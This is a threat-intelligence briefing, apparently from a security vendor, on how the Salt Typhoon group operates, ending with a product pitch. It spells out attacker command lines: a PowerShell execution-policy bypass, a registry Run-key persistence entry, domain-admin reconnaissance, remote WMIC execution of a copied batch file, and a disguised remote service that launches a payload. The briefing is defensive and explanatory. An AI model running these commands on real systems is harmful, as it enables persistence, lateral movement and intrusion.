Vectra AI Threat Briefing: Salt Typhoon

TL;DW: How Does Salt Typhoon Operate?

Salt Typhoon follows a structured attack sequence using built-in Windows tools to avoid detection. Here’s a breakdown of their tactics and the commands they use.

1. Initial Access

Salt Typhoon primarily exploits public-facing servers with known vulnerabilities. Instead of relying on phishing, they prefer N-day and zero-day exploits to gain remote code execution (RCE).

2. Execution & Persistence

Once they gain access, they execute malicious payloads and ensure persistence using Windows tools.

PowerShell Execution:

They use PowerShell to execute scripts without restrictions:

powershell -ex bypass -c "<password>"

• -ex bypass: Overrides execution policy to allow the script to run.
• <password>: Key used to decrypt the script, which is usually encrypted.

Registry Persistence:

To ensure malware runs every time a user logs in, they add a registry key:

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "<malware_name>" /t REG_SZ /d "<malware_path>" /f

• "HKCU\Software\Microsoft\Windows\CurrentVersion\Run": Registry location for auto-start programs.
• REG_SZ: Specifies a string value (the malware path).
• /f: Forces execution without confirmation.

3. Reconnaissance

Salt Typhoon gathers intelligence about the environment before escalating privileges.

Using WMIC (Windows Management Instrumentation Command-line)

wmic process get name,processid,commandline

• Lists all running processes and command-line arguments.

Using net group to Identify Domain Admins

cmd /c "net group 'domain admins' /domain"

• Queries Active Directory for domain admin accounts.
• /domain: Ensures the query applies to the Active Directory domain instead of just the local machine.

4. Credential Theft & Privilege Escalation

After reconnaissance, they escalate privileges and steal credentials.

Deploying Credential Theft Tools

They install tools like:

• Mimikatz (extracts credentials from memory).
• Keyloggers (records keystrokes).
• Credential Dumping utilities.

Privilege Escalation via Cobalt Strike

They deploy Cobalt Strike, a legitimate red teaming tool, to gain SYSTEM privileges and move deeper into the network.

5. Lateral Movement

Salt Typhoon spreads across the network using various Windows utilities.

Copying a Batch File to Another Machine

copy \\<target_ip>\C$\Windows\Temp\malware.bat

• Uses \\<target_ip> to specify a shared folder on another machine.
• Places a batch script (.bat) to be executed remotely.

Executing the Copied Script via WMIC

wmic /node:<target_ip> process call create "cmd /c C:\Windows\Temp\malware.bat"

• /node:<target_ip>: Specifies the target machine.
• process call create: Runs a process remotely.
• cmd /c: Executes the copied batch file.

Creating a Backdoor Using Windows Services (sc create)

sc \\<target_ip> create VGAuthtools binpath= "C:\Windows\System32\installutil.exe C:\Windows\Temp\malware.exe" start= auto type= own

• sc: Windows service control utility.
• \\<target_ip>: Creates the service remotely on another machine.
• VGAuthtools: Disguises malware as a legitimate tool.
• binpath: Uses installutil.exe (a legitimate Windows tool) to execute the malicious payload.
• start= auto: Ensures persistence by restarting the malware every time the machine reboots.

6. Command & Control (C2) + Data Exfiltration

Salt Typhoon establishes persistent communication with their C2 servers.

Cobalt Strike & Demodex Malware

• Sends "heartbeats" to signal compromised machines.
• Receives new instructions and updates.
• Exfiltrates stolen credentials and sensitive data.

Abusing Public Cloud Services for Exfiltration

Salt Typhoon avoids detection by using trusted platforms to upload stolen data:

• AnonFiles
• File.io
• GitHub
• Gmail

7. Ongoing Espionage & Impact

Salt Typhoon continuously monitors compromised networks and steals sensitive data over an extended period.

----

How Can Vectra AI Detect These Attacks?

Vectra AI’s platform focuses on real attack behaviors, not just known threats. This allows it to detect Salt Typhoon-like activity even when attackers use built-in Windows tools.

• ‍Unusual remote access & execution
• Suspicious Kerberos activity
• Privilege anomalies & SMB brute-force attempts
• Hidden tunnels & suspicious PowerShell activity

Learn more about our AI-driven detections or try our self-guided demo.

‍